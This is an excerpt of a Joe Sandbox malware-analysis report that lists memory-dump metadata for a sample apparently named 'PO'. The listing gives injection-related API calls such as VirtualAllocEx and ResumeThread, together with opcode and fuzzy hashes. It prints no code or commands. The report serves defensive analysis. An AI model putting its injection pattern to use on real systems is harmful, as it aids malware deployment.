                        • Source File: 00000007.00000002.2159867410.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_fc0000_PO.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 6e455ec22f0122b8d931af1a843fb22e00e8c9c1c069890cecb127fe36d57299
                        • Instruction ID: d31ebf7e8fbda3a1ba5a2bafabffe697b9cf045c98500b2600bcdecc26ce0d78
                        • Opcode Fuzzy Hash: 6e455ec22f0122b8d931af1a843fb22e00e8c9c1c069890cecb127fe36d57299
                        • Instruction Fuzzy Hash: CD1114B6D002099FDB10DF9AC545B9EFBF8EB48310F10842EE919B7200C379A945CFA5
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7a50000_PO.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 4118cb305427271e9cac0de1a121a0c561a4d21977de6c0484cdb415c8af84b7
                        • Instruction ID: 1e2af341b7294bac300f4bc62528201f338ab32e20f47a718f1261a434bfd102
                        • Opcode Fuzzy Hash: 4118cb305427271e9cac0de1a121a0c561a4d21977de6c0484cdb415c8af84b7
                        • Instruction Fuzzy Hash: B81149B59003498FDB20DFAAC4457EEFFF5EF89314F10841AD919A7240CB79A540CBA4
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A53C8E
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7a50000_PO.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: f11e656061dc49f11c9e1935fb94e84695ce93f4a77188a6d7bee505884266d4
                        • Instruction ID: 23fe79a5fa89aafc54f7e6ada1d0d9d3467bd66b03ec63309a627bb1bb28314f
                        • Opcode Fuzzy Hash: f11e656061dc49f11c9e1935fb94e84695ce93f4a77188a6d7bee505884266d4
                        • Instruction Fuzzy Hash: E71137B68002499FCB10DFAAC844AEEFFF5EF88314F108819E519A7250C779A554CFA0
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7a50000_PO.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 2e7764d2a2633795874416e768cac81dbff429f06bb2aafd37197e203e835760
                        • Instruction ID: 695bf17c78a1fa2aea76cd1c763593f89eb5c4d077a50e145b59ec5daf8dc47a
                        • Opcode Fuzzy Hash: 2e7764d2a2633795874416e768cac81dbff429f06bb2aafd37197e203e835760
                        • Instruction Fuzzy Hash: DF113AB5D002498FDB10DFAAC4457EEFBF5EF88314F208819D519A7240CB79A544CBA4
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00FCB7BE
                        Memory Dump Source
                        • Source File: 00000007.00000002.2159867410.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_fc0000_PO.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: d4362c46b28445a9d751a10683766822b065b881af788fbc72f022962608db28
                        • Instruction ID: f29c902c3362a50b0f8b24b743c169e86693002ebcc73fca162ca2aecfcf5a10
                        • Opcode Fuzzy Hash: d4362c46b28445a9d751a10683766822b065b881af788fbc72f022962608db28
                        • Instruction Fuzzy Hash: BD11DFBAC002498FDB10DF9AC549B9EFBF9AF88324F10841AD819A7610C379A545CFA1
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07A589DD
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7a50000_PO.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 9af5692b182b6e6386942791f63d0a9b072f8b358c52fcd2923779c4099466d9
                        • Instruction ID: 313b936960ea4fe5f54eff69c23bb29ed70426cd3189ec3fda30e405f0083544
                        • Opcode Fuzzy Hash: 9af5692b182b6e6386942791f63d0a9b072f8b358c52fcd2923779c4099466d9
                        • Instruction Fuzzy Hash: 4811C2B5800349DFDB10DF9AD845BDEBBF8EB49324F10885AE958A7200D379A944CFA5
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07A589DD
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7a50000_PO.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: bf3d345a872f60a576c4dce72e645ea68de6dd644c4deb2fd0d377a2bfb33721
                        • Instruction ID: b1c43fe1d0a824400251218ede3092804ae241a241a3e498567696a25b1d8367
                        • Opcode Fuzzy Hash: bf3d345a872f60a576c4dce72e645ea68de6dd644c4deb2fd0d377a2bfb33721
                        • Instruction Fuzzy Hash: AB1125B5800289DFDB10DF99C485BDEBFF4EB49320F10854AE868A7250C379A944CFA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID: V
                        • API String ID: 0-1342839628
                        • Opcode ID: dc9ef7e62d57f7d1bdc8f62b18d6d00f1296c1e9ab022794a4e5d34db497656e
                        • Instruction ID: 345b5102bed1218c63e8c0bfff9ed0a21464dbac2e3fc28e4864a62739abf914
                        • Opcode Fuzzy Hash: dc9ef7e62d57f7d1bdc8f62b18d6d00f1296c1e9ab022794a4e5d34db497656e
                        • Instruction Fuzzy Hash: A1519FF0914149CFDB158B9DD4807BDBFF5AF46305F04A2A6E522AA292C7B48D42CB12
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID: LR]q
                        • API String ID: 0-3081347316
                        • Opcode ID: 9b3f661fe4e185ab4d17e10f6742a6cacd94ee7ead13bee843ccdcd51e8c358f
                        • Instruction ID: 7905f510eea1e276c18fc790dcb0772c9f1a08716a69a4a7b4ecb90feac15d78
                        • Opcode Fuzzy Hash: 9b3f661fe4e185ab4d17e10f6742a6cacd94ee7ead13bee843ccdcd51e8c358f
                        • Instruction Fuzzy Hash: 6831E0B0E04341CFDB048B95D946BFEBBF5AB49701F08C266E955AB2C2D7749900CB92
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID: LR]q
                        • API String ID: 0-3081347316
                        • Opcode ID: 26d32292c1a5c70faece81bba80612505aebafb570d36b4cc1d6f5dc386fc688
                        • Instruction ID: c5270c0cdf3058fbf462175bfb4fbd2adeb4a55b7968f10979c74718782fc1a3
                        • Opcode Fuzzy Hash: 26d32292c1a5c70faece81bba80612505aebafb570d36b4cc1d6f5dc386fc688
                        • Instruction Fuzzy Hash: F23113B0E08341CFD7048F99C845AFEBBF1BB45301F08C26AE955AB2C2D7349840CB92
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID: Te]q
                        • API String ID: 0-52440209
                        • Opcode ID: 6153499f96003f8d4d4705bfaabb96489c201551701c4605ad1c8645c64e7b48
                        • Instruction ID: 2c4b5cf2991f964d06f1eb170cc5f9fffcf55945e4fae7320b43173634bb747f
                        • Opcode Fuzzy Hash: 6153499f96003f8d4d4705bfaabb96489c201551701c4605ad1c8645c64e7b48
                        • Instruction Fuzzy Hash: AE114C72B1020A8FCB44EFA999115EFB6F6AFC9610B504169C509E7344EF359D02CB92
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID: Te]q
                        • API String ID: 0-52440209
                        • Opcode ID: 64c4d79ea25d1e2b3f1d19b083223c9ba11e7e0acd53b66bf0cd315ce630f7ef
                        • Instruction ID: b342d8dcb517c610b1365228668fe459f561d97ef343c6ae7ed421cd8ab4316c
                        • Opcode Fuzzy Hash: 64c4d79ea25d1e2b3f1d19b083223c9ba11e7e0acd53b66bf0cd315ce630f7ef
                        • Instruction Fuzzy Hash: 891190B4E00209DFCB08CFE8D9849EDBBB5FB88300F108129E919AB365D631A946DB50
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 18feadff0d980976e865ebfee0e5095bc72b7bbb15a90e8ea9e3d8e3ac4037b5
                        • Instruction ID: 2d4c4293724fc2f9ac0be4d891f600f6b01cd7587ad0fc5a24f1ee6ea85a334e
                        • Opcode Fuzzy Hash: 18feadff0d980976e865ebfee0e5095bc72b7bbb15a90e8ea9e3d8e3ac4037b5
                        • Instruction Fuzzy Hash: 1EF1B575D1061E8FCB10DFA8C894AEDB7B5FF49300F1086AAD559B7214EB70AA85CF90
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 00d1fe29fb70db6bb809aafe48fca30917df4e003efd979bcea6bec40c25cf0a
                        • Instruction ID: c42630c38d8869b1d82468d8e767bdeb0fadb058d3a1c2b6e9ab2c3ea8b5e4cd
                        • Opcode Fuzzy Hash: 00d1fe29fb70db6bb809aafe48fca30917df4e003efd979bcea6bec40c25cf0a
                        • Instruction Fuzzy Hash: B8E1D575D1061A8FCB10DFA8C894AEDB7B5FF48300F1086AAD559B7214EB70AA85CF90
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bda43200e97ec22a04f89c1869520e7a0f70b53f36efd3ce56ec74eb1adc0e34
                        • Instruction ID: cbd9053a06a8f768302c7fec9393785050bf078173364525f300a3a16807040a
                        • Opcode Fuzzy Hash: bda43200e97ec22a04f89c1869520e7a0f70b53f36efd3ce56ec74eb1adc0e34
                        • Instruction Fuzzy Hash: 0661D034358A159BEB0DAB61E459AAD3B62FB84701F104214F9424F3E9CF775EC2CB85
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 894db430c4f5bfdd73d7d36d5dd442fe9436627448e992114ffeebc5320089cf
                        • Instruction ID: ea14a4c9eff553ab959d863194ebea5423dc4919c1482ae9a5751837b0ac67f4
                        • Opcode Fuzzy Hash: 894db430c4f5bfdd73d7d36d5dd442fe9436627448e992114ffeebc5320089cf
                        • Instruction Fuzzy Hash: B0717FB1A14204CFCB48CF68D584A6DFBB9FF44310F05A79AD4669B3A6C334E941CB50
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b2d60f2fe129ed5213dcf06ed2df62e31dd79c42d9bc90546cb03497294c6b57
                        • Instruction ID: 7de18f45994519f07ad556f5bd33073705ec9185c67d4f0035f53dd57515df94
                        • Opcode Fuzzy Hash: b2d60f2fe129ed5213dcf06ed2df62e31dd79c42d9bc90546cb03497294c6b57
                        • Instruction Fuzzy Hash: 4F513375E1010A9FCB04EFA8D9848EEF7B5FF89310B14C65AD915BB215EB30AA45CB90
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2c5402c39c10da5d1f6a328caf565acbfc2c8d5f1b70bbc59783953998f3b43b
                        • Instruction ID: d550b44b8f17460e9934318eb3d32bf849f66fe3fe613c3c14a2d46733901294
                        • Opcode Fuzzy Hash: 2c5402c39c10da5d1f6a328caf565acbfc2c8d5f1b70bbc59783953998f3b43b
                        • Instruction Fuzzy Hash: B4411AB4E19209DFDB08CFAAC4446EEBBFAEB8D301F14D169D429A7351D7309A41CB54
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 38bae864295e0247202dc4d6ae57d8d81852c218a4002392e48fa744199555ad
                        • Instruction ID: 394e113f966c50a8dab7a640dd14a571357ff0385af337afe766139f39c41604
                        • Opcode Fuzzy Hash: 38bae864295e0247202dc4d6ae57d8d81852c218a4002392e48fa744199555ad
                        • Instruction Fuzzy Hash: 3B31A1B591EBC0CFD316DB39A4542407FB0AF8620270A99DBC4D5CBAB3D6399819C712
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6a60bc553a223a5e1ce9349e85010d52858e48be845caf10bea68d87e3924ed6
                        • Instruction ID: 320429edbd532e3e4614a22030af84fd032baa7c8a631dfab0fe68eb693d484e
                        • Opcode Fuzzy Hash: 6a60bc553a223a5e1ce9349e85010d52858e48be845caf10bea68d87e3924ed6
                        • Instruction Fuzzy Hash: 8F3182B2B006099FCB25DE59D4806EEF7FAFFC4224F14822AD455A7740EB359915CB80
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d2b32ceef231802bae79de9dfa25407a4b01f878868403e7e90a780ec8784d4f
                        • Instruction ID: 5199a6d28f6e474562ca47638a8c9dee3b68db01a2a358db1788b2ea8e6bff57
                        • Opcode Fuzzy Hash: d2b32ceef231802bae79de9dfa25407a4b01f878868403e7e90a780ec8784d4f
                        • Instruction Fuzzy Hash: 3921F81649D3E00FE303AB7C9AB1BC53F68EF53224F0A41A3C8D58A1A7D55C944ED27A
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b772247dcc6435a5bd2d83294c528cf2e4179681f72120a793172b48ea1797b8
                        • Instruction ID: 30dc16dec81a74413ca35717ade1a7366b908a09006b3466ce04a8fb19564445
                        • Opcode Fuzzy Hash: b772247dcc6435a5bd2d83294c528cf2e4179681f72120a793172b48ea1797b8
                        • Instruction Fuzzy Hash: 2B314DB4E09248DFD708CFAAC4446EEBFFAEB8A301F18D169E469A7251D7344A41CB54
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1baa03c41c801620299d02a0ee2bec228496a2a8f7998dbbfb047c1b183dad24
                        • Instruction ID: 1bee0fcce451d139144ac9cf831ecf36aa4e37700399e91b16e706c2d0c0995f
                        • Opcode Fuzzy Hash: 1baa03c41c801620299d02a0ee2bec228496a2a8f7998dbbfb047c1b183dad24
                        • Instruction Fuzzy Hash: 403180B1D0421A9FCB10DFA8C885AFEBFF4EF45311F20462AE514E7291DB349A41CBA1
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 53954ddf41137b5dd34fba3f573d89ecdca09e3bf663664071026712d76a5074
                        • Instruction ID: 41182631ae36d37342297e3f7c20a505b0e7d7ea59ef63485b266c408e879608
                        • Opcode Fuzzy Hash: 53954ddf41137b5dd34fba3f573d89ecdca09e3bf663664071026712d76a5074
                        • Instruction Fuzzy Hash: 90310935A10619DFCB04EF98C884CEDFBB5FF89310F0186A9E545AB321EB70A945CB90
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4fd5f076effe95064775912775664c7bab01a5798f99122fdc61462504e9c74d
                        • Instruction ID: ea319c7a2e20689717cdd6adebe0ca5438d83408ac6110ec3fa6c8cb0364d0ef
                        • Opcode Fuzzy Hash: 4fd5f076effe95064775912775664c7bab01a5798f99122fdc61462504e9c74d
                        • Instruction Fuzzy Hash: E03118B0E14209DFDB48DFA9D6816AEBBF6FF89300F14C66AD415A7250DB349A40CF91
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e14c187bfc01ec8dcd2b9661f85667c66bdbbbdfa1d4637abee89ba4ea8e4cb9
                        • Instruction ID: 606934d23813738ddf8b92f31e0e148dee467f8595b45e8300cf4ca6fbf20583
                        • Opcode Fuzzy Hash: e14c187bfc01ec8dcd2b9661f85667c66bdbbbdfa1d4637abee89ba4ea8e4cb9
                        • Instruction Fuzzy Hash: C63138B0E05249DFDB48CFA9C5406AEBFF6AB89300F14C2AAD055AB251D7349A40CB91
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4f22e5a15d9016c4ce4987ecd0bdd653ad9e9d6243b05b88bb7bc5c7f6c8a664
                        • Instruction ID: 5babbabe7cfa1faa6b64e9520fd527789c1e66a3109bcd790afef93fb1a69916
                        • Opcode Fuzzy Hash: 4f22e5a15d9016c4ce4987ecd0bdd653ad9e9d6243b05b88bb7bc5c7f6c8a664
                        • Instruction Fuzzy Hash: DA31E7B4E242199FCB08CFAAD8445EEBBF6FB89301F10852AE815B7354DB74A901CF51
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d24fb27da7766328f6d8bd6ad76d18e4e09a4438841be04450bc77414f109b08
                        • Instruction ID: f5746a6ab95c07583af1cf4188fea2c7abeeab8e6da5c4a33f305af64f2a5a99
                        • Opcode Fuzzy Hash: d24fb27da7766328f6d8bd6ad76d18e4e09a4438841be04450bc77414f109b08
                        • Instruction Fuzzy Hash: BD312775A10219DFCB04DF94C894DDDBBB5FF88310F0186A9E515AB361EB70A946CB90
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 99c3e0f946a5326ebb2eaed61f6319faa49e55c4282807b4b998d9ed1cfd4866
                        • Instruction ID: eba4b1d634de522f5bba2667e2185912cec713bb1da6f6c1b0b0aba6c469ba93
                        • Opcode Fuzzy Hash: 99c3e0f946a5326ebb2eaed61f6319faa49e55c4282807b4b998d9ed1cfd4866
                        • Instruction Fuzzy Hash: CF316DB4916205CFE790CB68C544A9EBBFAEF0A315F54E295D0184B212C731D985CFA1
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0cd2ada8164cb8492f08a1501b7767f545f9ce58d3a5e7ca7d65b2afee7b896c
                        • Instruction ID: 3019d8da028dbd962870f20eb9d1b50192ef49e910ab220a64fe902b78d85a49
                        • Opcode Fuzzy Hash: 0cd2ada8164cb8492f08a1501b7767f545f9ce58d3a5e7ca7d65b2afee7b896c
                        • Instruction Fuzzy Hash: C03128B4E24219DFCB08CFA9D8446DEBBF6FB89301F10852AE415B7254DB34A901CF51
                        Memory Dump Source
                        • Source File: 00000007.00000002.2157577528.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_c7d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f019074bf600101ed9de37c909ac7f4a018ac043db384df875335e466fcefea8
                        • Instruction ID: 128b95b6aba91ca4d475303946ae2ce9d9cc470fe14634e34537a42cb3928a8e
                        • Opcode Fuzzy Hash: f019074bf600101ed9de37c909ac7f4a018ac043db384df875335e466fcefea8
                        • Instruction Fuzzy Hash: 5121FFB1500240DFCB05DF24D980B26BF75FF98328F24C669E90A0A256C33AD956DBA2
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 378977ed0b3e060835104212faf12d8293d69bdb84641da8d0bd6f4c90e1496e
                        • Instruction ID: 238d0e079d94241f1676259d308a4c5c0d81e8976ac3b7467c7e7fe876c6a83f
                        • Opcode Fuzzy Hash: 378977ed0b3e060835104212faf12d8293d69bdb84641da8d0bd6f4c90e1496e
                        • Instruction Fuzzy Hash: DD2160B0D043598FCB01DFA8C8459EEBFF4EF46310F1542AAE554EB292D7349945CBA2
                        Memory Dump Source
                        • Source File: 00000007.00000002.2157845266.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_c8d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 557504577222984a9d63ea671bf41fff8bd89e2c756012595397d8ece01cb9d3
                        • Instruction ID: c729935e02dd4a4be82bc1ffa53aad05d1025bc5a39256d862f1d990ee165cd2
                        • Opcode Fuzzy Hash: 557504577222984a9d63ea671bf41fff8bd89e2c756012595397d8ece01cb9d3
                        • Instruction Fuzzy Hash: 9B21D071604204EFDB14EF24D984B26BB65EB88318F20C569E94A4B296C33AD806CB66
                        Memory Dump Source
                        • Source File: 00000007.00000002.2157845266.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_c8d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4cd049e24fd0e6c723f0ca4d41efd13c64311b7e371fcebd1e90f760cad454f3
                        • Instruction ID: e41db311c53d78fa91aea3a5af71f47388d69b34563b8064fb0dec89f3fdecfc
                        • Opcode Fuzzy Hash: 4cd049e24fd0e6c723f0ca4d41efd13c64311b7e371fcebd1e90f760cad454f3
                        • Instruction Fuzzy Hash: C721F571504204DFDB05EF54D5C0F26BB65FB84318F20C5ADE90A4B296C33ADC46CB65
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4c55d9378dfa3dd197f34ebfcaca8c1b49c684620ea13081390071d46572f527
                        • Instruction ID: 158ddb0fce6bdbcab7ce8d867908704c1ef1023a4ee1fceeffba47e3ce4be952
                        • Opcode Fuzzy Hash: 4c55d9378dfa3dd197f34ebfcaca8c1b49c684620ea13081390071d46572f527
                        • Instruction Fuzzy Hash: F9213275B102058FCF44DF69C8949AEBBB9FF89200B1142BDE905E7355EB34AD05CBA1
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 67b7e29d3776230683deb2603387304a8beb8ca6810ffa99be39defeeb50ccb7
                        • Instruction ID: e3d6dde78fc7e485b15c9509b3f8619cc939dbfeb2a53ac64750b824a8823d65
                        • Opcode Fuzzy Hash: 67b7e29d3776230683deb2603387304a8beb8ca6810ffa99be39defeeb50ccb7
                        • Instruction Fuzzy Hash: 57211275F1020A8FCF44EF69C8845EEB7B9FF89300B118669D905B7315EB70A945CBA1
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 912dbcb68e12a367a4a04d73fafbaa56239d8c6a85ae96e6ca8575937b5f7795
                        • Instruction ID: 7c8ad42a4ac66a64fd562bb939ad99caa44f17e0beaa94a4d47e0d5718dd9a8e
                        • Opcode Fuzzy Hash: 912dbcb68e12a367a4a04d73fafbaa56239d8c6a85ae96e6ca8575937b5f7795
                        • Instruction Fuzzy Hash: FB11A3B4A2D244CFCB08DBA4D0415EDBBB8EB5B311F1452E6E82987716C6318A41CF40
                        Memory Dump Source
